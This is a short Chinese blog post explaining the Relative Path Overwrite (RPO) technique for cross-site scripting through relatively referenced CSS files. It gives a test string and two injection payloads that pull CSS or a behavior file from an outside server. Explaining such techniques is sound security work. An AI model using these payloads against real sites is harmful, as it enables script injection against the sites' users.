Ricky Hao

XSS:RPO(Relative Path Overwrite)攻击

0x00

具体原理参考:
Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻击

0x01

RPO攻击首先利用的是通过相对路径引入的CSS,如

<link href="styles.css" rel="stylesheet" type="text/css" />

当我们在URL最后添加

/%0a{}*{background:red;}/

的时候会发现页面执行了我们的css代码。
通过这点,我们可以做到任意加载服务器上的文件。
假若我们能控制某些文件就可以达到XSS的目的。

几个Payload:

/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/
点赞

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据